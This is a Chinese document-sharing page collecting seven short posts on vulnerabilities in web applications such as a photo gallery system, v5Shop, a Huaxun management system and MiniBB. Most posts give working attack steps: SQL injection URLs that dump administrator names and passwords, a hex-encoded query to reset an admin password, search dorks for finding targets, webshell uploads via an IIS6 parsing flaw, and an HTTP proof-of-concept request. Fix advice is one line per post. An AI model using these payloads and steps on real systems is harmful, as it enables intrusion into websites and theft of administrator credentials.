魔方网络摄影系统注入漏洞及利用和修复

时间:2022-11-30 00:57:06 作者:kyco珺 综合材料 收藏本文 下载本文

“kyco珺”通过精心收集,向本站投稿了7篇魔方网络摄影系统注入漏洞及利用和修复,以下是小编收集整理后的魔方网络摄影系统注入漏洞及利用和修复,仅供参考,欢迎大家阅读。

篇1:魔方网络摄影系统注入漏洞及利用和修复

魔方网络摄影系统

注入点: /news.php?action=detail&id=[SQLi]

利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的

第二步,后台地址为/admin.php,进去管理后台试图拿webshell

第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马

第四步,菜刀连接一句话木马

第五步,进一步提权,拿下服务器,。。

--------------------------------------------------------------------------------

应该是统一建站的 连mysql 密码都是明文 无语啊.... 估计见一个死一个 不是密码为空 就是明文getshell 有时间 看看有没有其他的包含漏洞cgi过滤 太恶心了

其实cgi 嘛你懂的像这个 /data/attachment/1.php;1.jpg

不一定有效

FastCGI Error

The FastCGI Handler was unable to process the request.

Error Details:

Could not find entry for “jpg” on site 236134254 in [Types] section.

Error Number: 1413 (0x80070585).

Error Description: ÎTD§Ë÷òy¡£

HTTP Error 500 - Server Error.

Internet Information Services (IIS)

提供修复方案:

过滤news.php页面参数输入,

修复iis6解析漏洞

篇2:魔方网络摄影系统注入漏洞及利用漏洞预警

魔方网络摄影系统

注入点:/news.php?action=detail&id=[SQLi]

利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的

第二步,后台地址为/admin.php,进去管理后台试图拿webshell

第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马

第四步, 直接连接一句话 -_,

篇3:v5Shop注入漏洞及修复

/commond.aspx?id=1869

没办法union,只能让它暴错了

暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--

暴管理员密 码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--

过滤了单引号.只能把字符串转化成16进制的了

更新管理员密码:update web_admin set

pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042

004400450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

拿webshell

切记.千万不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

关键字:services.aspxid=

inurl:scoreindex.aspx

默认后台地址:weblogin/Login.aspx

/weblogin/index.aspx

复制这段代码 域名+代码

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044

00450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

后台拿webshell

切记.不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

文章作者:黑面小窝

修复:对照过滤

篇4:DirectX漏洞被利用 马上修复系统

微软及其他公司的安全专家担心,继上周“冲击波”蠕虫病毒通过互联网进行大肆传播之后,最近在DirectX中发现的安全漏洞可能会引发更严重的问题,

微软似乎在“冲击波”的袭击中生存了下来,但现在它更积极地鼓励Windows用户修复软件中潜在的、不同的、更危险的安全漏洞。

尽管大多数公司已安装了应对“冲击波”的补丁,但另一个安全漏洞可能会被利用,再现上周阴影。

微软曾于今年7月23日在它的 上发出安全公告称,各版本的DirectX中均存在着一个“危急”的安全漏洞。

微软表示,该漏洞是由DirectX中一个依赖于被称为“quartz.dll”库文件的组件引起的。“quartz.dll”是用来来播放midi文件的,它应用于微软的众多程序中,包括Internet Explorer等,

一个经过特殊设计的midi文件可能会导致缓冲区溢出错误或使攻击者取得对受害用户系统的控制权,从而对受害用户的系统造成损害或利用受害用户的系统制造类似于“冲击波”的另一轮袭击。

TruSecure安全公司的首席科学家Russ Cooper预计,利用Windows另一安全漏洞的蠕虫或病毒将会在短期内出现。他说:“我们最担心的是DirectX中的漏洞。”他认为由于只有极少数用户针对该漏洞进行了修复,这一安全隐患目前仍是广泛存在的。

Cooper相信,DirectX中的漏洞有可能被类似于在“冲击波”中使用的方法所利用。

点击这里查看微软第MS03-030号安全。

点击阅读更多学院相关文章>>

分享到

篇5:华讯网络管理系统注入漏洞利用漏洞预警

华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,

关键字:inurl:chk_case.asp

漏洞测试:

www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin

默认后台:

www.site.com/admin/

篇6:simplelog v1.3.1 注入漏洞及修复

Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.

程序下载地址:html“>/ym/201104/27199.html

----------------------------------------------

刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,

simplelog v1.3.1 注入漏洞及修复

谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode惹的祸。

试了下,真可以爆啊,无语了。

再上一张图吧,数据依然可以爆掉。

作者:tojen

篇7:MiniBB 2.5 SQL注入漏洞及修复

MiniBB是一个袖珍型开源PHP论坛软件,MiniBB 2.5中的index.php文件存在SQL注入漏洞,可能导致敏感信息泄露,

[+]info:

~~~~~~~~~

MiniBB 2.5 SQL Injection Vulnerability

Product: MiniBB

Vendor: MiniBB.com ( www.minibb.com/ )

Vulnerable Version: 2.5

Vendor Notification: 21 October 2010

Vulnerability Type: SQL Injection

[+]poc:

~~~~~~~~~

POST /index.php?action=registernew HTTP/1.1

Host: [host]

Referer: [host]/index.php?action=registernew

Content-Type: application/x-www-form-urlencoded

Content-Length: 225

action=register&login=pentest&passwd=pentest&passwd2=pentest&email=pentest%40pentest.com&icq=1%5C%5C&occupation=2%5C%5C&from=3%5C%5C&interest=4%5C%5C&user_viewemail=5%5C%5C&user_sorttopics=6%5C%5C&language=7%5C%5C&login=Login

[+]Reference:

~~~~~~~~~

www.htbridge.ch/advisory/sql_injection_in_minibb.html

www.hack50.com修复:index.php过滤

Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复

Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警

永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警

micecms一个鸡肋漏洞及修复 附EXP漏洞预警

微软发布安全补丁:修复10个危急21个一般漏洞

网络/系统工程师简历

一次枫叶防注入程序漏洞手工入侵脚本安全

单站无源定位注入式仿真系统探讨

人教版合理利用网络教学设计

要学会利用网络学习英语

魔方网络摄影系统注入漏洞及利用和修复(集锦7篇)

欢迎下载DOC格式的魔方网络摄影系统注入漏洞及利用和修复,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档